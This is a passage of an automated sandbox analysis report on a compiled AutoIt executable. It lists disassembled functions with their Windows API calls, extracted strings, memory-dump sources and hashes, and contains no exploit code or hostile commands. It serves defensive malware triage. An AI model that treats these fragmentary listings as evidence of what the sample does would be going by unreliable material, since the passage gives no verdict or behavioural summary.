                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                  • API String ID: 799131459-1154884017
                                                                                                                  • Opcode ID: d715f147ddeb1e808c3542c917a7239f8ea23ab65f6215d25bb5f450a37069db
                                                                                                                  • Instruction ID: cd397cb4e22b0f0b14071fcf3634657b695f0bf13e5a80974ee1d38d0fb4a5c1
                                                                                                                  • Opcode Fuzzy Hash: d715f147ddeb1e808c3542c917a7239f8ea23ab65f6215d25bb5f450a37069db
                                                                                                                  • Instruction Fuzzy Hash: 2F61B271540215BBEB14DF64CC81BBE7BACFB18B11F10468AF916DA1D1DF749A80DBA0
                                                                                                                  Function 00AB7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 0-1645009161
                                                                                                                  • Opcode ID: 9c05f5266f52a00cdd2d28e0c269e420c195890851958794ae90bf33b076a3c4
                                                                                                                  • Instruction ID: 46e1dc50821801039455887fa55f5090ce297a405bbab13f9fc536df216188aa
                                                                                                                  • Opcode Fuzzy Hash: 9c05f5266f52a00cdd2d28e0c269e420c195890851958794ae90bf33b076a3c4
                                                                                                                  • Instruction Fuzzy Hash: B481E671A04609BBDB20AFA0CD42FFE3BA9AF55300F054065FA05AB193EFB4DA51D791
                                                                                                                  Function 00B23E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00B23EF8
                                                                                                                  • _wcslen.LIBCMT ref: 00B23F03
                                                                                                                  • _wcslen.LIBCMT ref: 00B23F5A
                                                                                                                  • _wcslen.LIBCMT ref: 00B23F98
                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00B23FD6
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B2401E
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B24059
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B24087
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 1839972693-4113822522
                                                                                                                  • Opcode ID: 8e360ca61fac2cab49a841b672a1a442588c442e272e356b1e67c04c47b53641
                                                                                                                  • Instruction ID: fd1cb2d9aa4ae24eb1da25a11a5c010253143c9dc3cc7564adc1c757c122c719
                                                                                                                  • Opcode Fuzzy Hash: 8e360ca61fac2cab49a841b672a1a442588c442e272e356b1e67c04c47b53641
                                                                                                                  • Instruction Fuzzy Hash: 5571F0326042119FC310DF34D9918ABB7F8EF94B54F00896DF9AA97262EB34DE49CB51
                                                                                                                  Function 00B15A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00B15A2E
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B15A40
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00B15A57
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00B15A6C
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00B15A72
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B15A82
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00B15A88
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B15AA9
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B15AC3
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B15ACC
                                                                                                                  • _wcslen.LIBCMT ref: 00B15B33
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00B15B6F
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B15B75
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B15B7C
                                                                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B15BD3
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00B15BE0
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B15C05
                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B15C2F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 895679908-0
                                                                                                                  • Opcode ID: 72e7d6dbc5ed7652d98b87c97dae0d55861d390ad4ebe486226c2c8df2cd3231
                                                                                                                  • Instruction ID: 7139c281bf3fbfda2ce37bd4ae6f4f0990d1b6ada727a0e042f33ee863289f5a
                                                                                                                  • Opcode Fuzzy Hash: 72e7d6dbc5ed7652d98b87c97dae0d55861d390ad4ebe486226c2c8df2cd3231
                                                                                                                  • Instruction Fuzzy Hash: 0A716D31900B09EFDB20DFA8CE85AAEBBF5FF88B04F504558E542A35A0DB75E940CB50
                                                                                                                  Function 00B2FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00B2FE27
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00B2FE32
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00B2FE3D
                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00B2FE48
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00B2FE53
                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00B2FE5E
                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00B2FE69
                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00B2FE74
                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00B2FE7F
                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00B2FE8A
                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00B2FE95
                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00B2FEA0
                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00B2FEAB
                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00B2FEB6
                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00B2FEC1
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00B2FECC
                                                                                                                  • GetCursorInfo.USER32(?), ref: 00B2FEDC
                                                                                                                  • GetLastError.KERNEL32 ref: 00B2FF1E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3215588206-0
                                                                                                                  • Opcode ID: 1d2e3e5b2b1be1a38bc611e66f34842b2a4fdc02838c43d78cf6bb20c8171996
                                                                                                                  • Instruction ID: cd1f34d3fe8bcf3c4bfd708e9a4b11cf6cbd4cce246da4918a19cca95c312c58
                                                                                                                  • Opcode Fuzzy Hash: 1d2e3e5b2b1be1a38bc611e66f34842b2a4fdc02838c43d78cf6bb20c8171996
                                                                                                                  • Instruction Fuzzy Hash: AE4172B0D0531A6ADB109FBA9C8586EBFF8FF04714B50417AE11CE7281DB7899018E91
                                                                                                                  Function 00AD00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AD00C6
                                                                                                                    • Part of subcall function 00AD00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B8070C,00000FA0,2E95E94B,?,?,?,?,00AF23B3,000000FF), ref: 00AD011C
                                                                                                                    • Part of subcall function 00AD00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AF23B3,000000FF), ref: 00AD0127
                                                                                                                    • Part of subcall function 00AD00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AF23B3,000000FF), ref: 00AD0138
                                                                                                                    • Part of subcall function 00AD00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AD014E
                                                                                                                    • Part of subcall function 00AD00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AD015C
                                                                                                                    • Part of subcall function 00AD00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AD016A
                                                                                                                    • Part of subcall function 00AD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AD0195
                                                                                                                    • Part of subcall function 00AD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AD01A0
                                                                                                                  • ___scrt_fastfail.LIBCMT ref: 00AD00E7
                                                                                                                    • Part of subcall function 00AD00A3: __onexit.LIBCMT ref: 00AD00A9
                                                                                                                  Strings
                                                                                                                  • kernel32.dll, xrefs: 00AD0133
                                                                                                                  • SleepConditionVariableCS, xrefs: 00AD0154
                                                                                                                  • WakeAllConditionVariable, xrefs: 00AD0162
                                                                                                                  • InitializeConditionVariable, xrefs: 00AD0148
                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AD0122
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                  • API String ID: 66158676-1714406822
                                                                                                                  • Opcode ID: 841e508885d40425ca776be4531a6d56af3eaf1e62ac869335392d50ba01cbf3
                                                                                                                  • Instruction ID: e1419d8d0ee40cd1a0367b165758678a4a6e5fe08fa7246749a4a788627f8b77
                                                                                                                  • Opcode Fuzzy Hash: 841e508885d40425ca776be4531a6d56af3eaf1e62ac869335392d50ba01cbf3
                                                                                                                  • Instruction Fuzzy Hash: 1F21C636A457116BE7506BA4AD05F6A77E4FF05F91F01063AF806A73A1DF749D008A90
                                                                                                                  Function 00B130F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                  • API String ID: 176396367-1603158881
                                                                                                                  • Opcode ID: 60ac8960748d29322920a0ffda4b230885eb5146205f7c133bf6fc5e41f17e05
                                                                                                                  • Instruction ID: f5bdc69c7165076cb5354614b47dc7de53c275a94695339af5e826792f7753f0
                                                                                                                  • Opcode Fuzzy Hash: 60ac8960748d29322920a0ffda4b230885eb5146205f7c133bf6fc5e41f17e05
                                                                                                                  • Instruction Fuzzy Hash: EAE1D632A00516ABCB149F78C4916EDBBF5FF54F10F9481A9E466B7240EB30AEC587D0
                                                                                                                  Function 00B244C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(00000000,00000000,00B4CC08), ref: 00B24527
                                                                                                                  • _wcslen.LIBCMT ref: 00B2453B
                                                                                                                  • _wcslen.LIBCMT ref: 00B24599
                                                                                                                  • _wcslen.LIBCMT ref: 00B245F4
                                                                                                                  • _wcslen.LIBCMT ref: 00B2463F
                                                                                                                  • _wcslen.LIBCMT ref: 00B246A7
                                                                                                                    • Part of subcall function 00ACF9F2: _wcslen.LIBCMT ref: 00ACF9FD
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00B76BF0,00000061), ref: 00B24743
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                                  • Opcode ID: 0122debf9710347934cc0b46c9d8357712cba6ba4daa54b13e9a81eb3118f24e
                                                                                                                  • Instruction ID: 4a16c1f1067b016658c7f6802eb9ee8d9f00559a796c36ef8c163db5ec46439c
                                                                                                                  • Opcode Fuzzy Hash: 0122debf9710347934cc0b46c9d8357712cba6ba4daa54b13e9a81eb3118f24e
                                                                                                                  • Instruction Fuzzy Hash: CAB1E1316083229FC710DF28E991A6EB7E5EFA6720F50499DF4AAC7692D730DC44CB52
                                                                                                                  Function 00B3AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B198
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B1B0
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B1D4
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B200
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B214
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B236
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B332
                                                                                                                    • Part of subcall function 00B205A7: GetStdHandle.KERNEL32(000000F6), ref: 00B205C6
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B34B
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B366
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B3B3B6
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00B3B407
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B3B439
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3B44A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3B45C
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3B46E
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B3B4E3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178637699-0
                                                                                                                  • Opcode ID: 85645e6e079290c6737c8cde38f48429445691f9bf5fd9ba5f8b452e488c317f
                                                                                                                  • Instruction ID: 710c50351d301172c6b6b9a91bbc6b8742a6ad4ce6bcc4cdcf19a46d9bd37808
                                                                                                                  • Opcode Fuzzy Hash: 85645e6e079290c6737c8cde38f48429445691f9bf5fd9ba5f8b452e488c317f
                                                                                                                  • Instruction Fuzzy Hash: 17F17A316042009FC724EF24C991F6EBBE5EF85710F24859DF99A9B2A6CB71EC44CB52
                                                                                                                  Function 00AB326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenuItemCount.USER32(00B81990), ref: 00AF2F8D
                                                                                                                  • GetMenuItemCount.USER32(00B81990), ref: 00AF303D
                                                                                                                  • GetCursorPos.USER32(?), ref: 00AF3081
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00AF308A
                                                                                                                  • TrackPopupMenuEx.USER32(00B81990,00000000,?,00000000,00000000,00000000), ref: 00AF309D
                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AF30A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 36266755-4108050209
                                                                                                                  • Opcode ID: 7bf4e87879df400d58b5937b24a9c43aa5d3bd97cff923930e4e0098f28cacb8
                                                                                                                  • Instruction ID: af09181ce2706fab7ee166c769bb169cc4a0298033688b5e49ea279bf212b5e0
                                                                                                                  • Opcode Fuzzy Hash: 7bf4e87879df400d58b5937b24a9c43aa5d3bd97cff923930e4e0098f28cacb8
                                                                                                                  • Instruction Fuzzy Hash: 19712971641209BEEB218FA4CC49FEABF78FF05764F204216F6146A1E1CBB1AD50DB90
                                                                                                                  Function 00B46CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00B46DEB
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B46E5F
                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B46E81
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B46E94
                                                                                                                  • DestroyWindow.USER32(?), ref: 00B46EB5
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AB0000,00000000), ref: 00B46EE4
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B46EFD
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B46F16
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B46F1D
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B46F35
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B46F4D
                                                                                                                    • Part of subcall function 00AC9944: GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                  • API String ID: 2429346358-3619404913
                                                                                                                  • Opcode ID: 1f79b88508b2967733ac5acbc48c6eeca1bac82bc664356aa33d194ba515542d
                                                                                                                  • Instruction ID: 4afd9bb602d608d40e9cc19eb6fbcea2217c58579148f0697f8b8f414513c74d
                                                                                                                  • Opcode Fuzzy Hash: 1f79b88508b2967733ac5acbc48c6eeca1bac82bc664356aa33d194ba515542d
                                                                                                                  • Instruction Fuzzy Hash: B9715974144345AFDB21CF18DC44FAABBF9FB8A704F04485DF99987261CB70AA0ADB12
                                                                                                                  Function 00B4911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00B49147
                                                                                                                    • Part of subcall function 00B47674: ClientToScreen.USER32(?,?), ref: 00B4769A
                                                                                                                    • Part of subcall function 00B47674: GetWindowRect.USER32(?,?), ref: 00B47710
                                                                                                                    • Part of subcall function 00B47674: PtInRect.USER32(?,?,00B48B89), ref: 00B47720
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B491B0
                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B491BB
                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B491DE
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B49225
